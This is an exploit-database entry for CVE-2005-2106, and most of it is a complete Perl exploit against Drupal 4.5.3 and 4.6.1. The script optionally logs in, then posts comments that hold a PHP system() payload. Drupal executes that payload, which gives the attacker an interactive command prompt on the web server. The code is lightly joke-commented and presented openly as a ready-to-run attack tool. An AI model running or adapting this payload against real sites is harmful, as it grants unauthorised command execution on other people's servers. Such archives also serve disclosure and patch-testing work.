Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit

2005-07-05T00:00:00
ID EDB-ID:1088
Type exploitdb
Reporter dab
Modified 2005-07-05T00:00:00

Description

Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit. CVE-2005-2106. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
# Mon Jul  4 18:19:35 CEST 2005 dab@digitalsec.net
#
# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)
# Hax0r code here, read before execute
#
# Run without arguments to show the help.
#
# BLINK! BLINK! BLINK! BLINK!
#
# Feel free to port to another stupid script language (mIRC,
# python, TCL or orthers), and send to securiteam (AGAIN)
# 
# Theo, this one hasn't been tested in BSD.. yet!
# infohacking: there're a lot of xss in drupal, contact me if you want 
# to program some exploits.
#
# BLINK! BLINK! BLINK! BLINK!
#
#
# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE
# contact me for pricing and offerings.
#
# !dSR: yubiiiiii yeooooooooooo
#
use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # ;1 = |$

my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$drupal_user,$drupal_pass);
my $options = GetOptions (
  'host=s'		     =&gt; \$host, 
  'proxy=s'           =&gt; \$proxy,
  'proxy_user=s'      =&gt; \$proxy_user,
  'proxy_pass=s'      =&gt; \$proxy_pass,
  'drupal_user=s'      =&gt; \$drupal_user,
  'drupal_pass=s'      =&gt; \$drupal_pass,
	'debug'         	 =&gt; \$debug);

&help unless ($host);

while (1){
    print "druppy461\$ ";
    my $cmd = &lt;STDIN&gt;;
    &druppy($cmd);
}
exit (1); # could be replaced with exit(2)


sub druppy {
    chomp (my $cmd = shift);
    LWP::Debug::level('+') if $debug;

    my $ua = new LWP::UserAgent(
            cookie_jar=&gt; { file =&gt; "$$.cookie" });   # this is a random feature
    $ua-&gt;agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");

    if ($drupal_user) { # no need to exploit 
        my ($mhost, $h);
        if ($host =~ /(http:\/\/.*?)\?q=/) {
            $mhost = $1;
            $h = $mhost . "?q=user/login";
        } #some magic hacking here
        else { 
            $host =~ /(.*?)\/.*?\//; $mhost =$1;
            $h = $mhost . "/user/login";
        }
        print $h . "\n" if $debug; 
        my $req = POST $h,[
            'edit[name]' =&gt; "$drupal_user",
            'edit[pass]' =&gt; "$drupal_pass"
                ]; #grab these, and send to dsr!
        print $req-&gt;as_string() if $debug;
        my $res = $ua-&gt;request($req);
        print $res-&gt;content() if $debug;
        if ($res-&gt;is_redirect eq 1) {
            print "Logged\n" if $debug;
        }
    }

    $ua-&gt;proxy(['http'] =&gt; $proxy) if $proxy;
    my $req-&gt;proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
    my $res = $ua-&gt;get("$host");
    my $html = $res-&gt;content();
    my @op; # buffer overflow here
    foreach (split(/\n/,$html)) { 
        if ( m/name="op" value="(.*?)"/){
            push(@op,$1);
        }
    }# xss here

    my $ok = 0; # globlal for admin purposes
    foreach my $op (@op) {
        my $req = POST "$host",[
            'edit[subject]' =&gt; 'test',
            'edit[comment]' =&gt; 
             "&lt;?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\");  php?&gt;",
            'edit[format]' =&gt; '2',
            'edit[cid]' =&gt; "", # drupal is sick.. it doesn't need arguments
            'edit[pid]' =&gt; "", # they use it to grab some statistycal information
            'edit[nid]' =&gt; "", # about users conduits. Don't buy in internet using drupal
            'op' =&gt; "$op"
                ];

        print $req-&gt;as_string() if $debug;
        my $res = $ua-&gt;request($req);
        my $html = $res-&gt;content(); 
        print $html if $debug;
        foreach (split(/\n/,$html)) {
            return if $ok gt "1";       # super hack de phrack
            if (/BLAH/) { $ok++; next }
            print "$_\n" if $ok eq "1"; # /n is for another line in screen
        }
    }
}


sub help {
    print "Syntax: ./$0 &lt;url&gt; [options]\n";
    print "\t--drupal_user, --drupal_pass  (needed if dont allow anonymous posts)\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "\nExample\n";
    print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n";
    print "\n";
    exit(1);
}


#sub 0day_solaris {
# please put your code here
#}

# milw0rm.com [2005-07-05]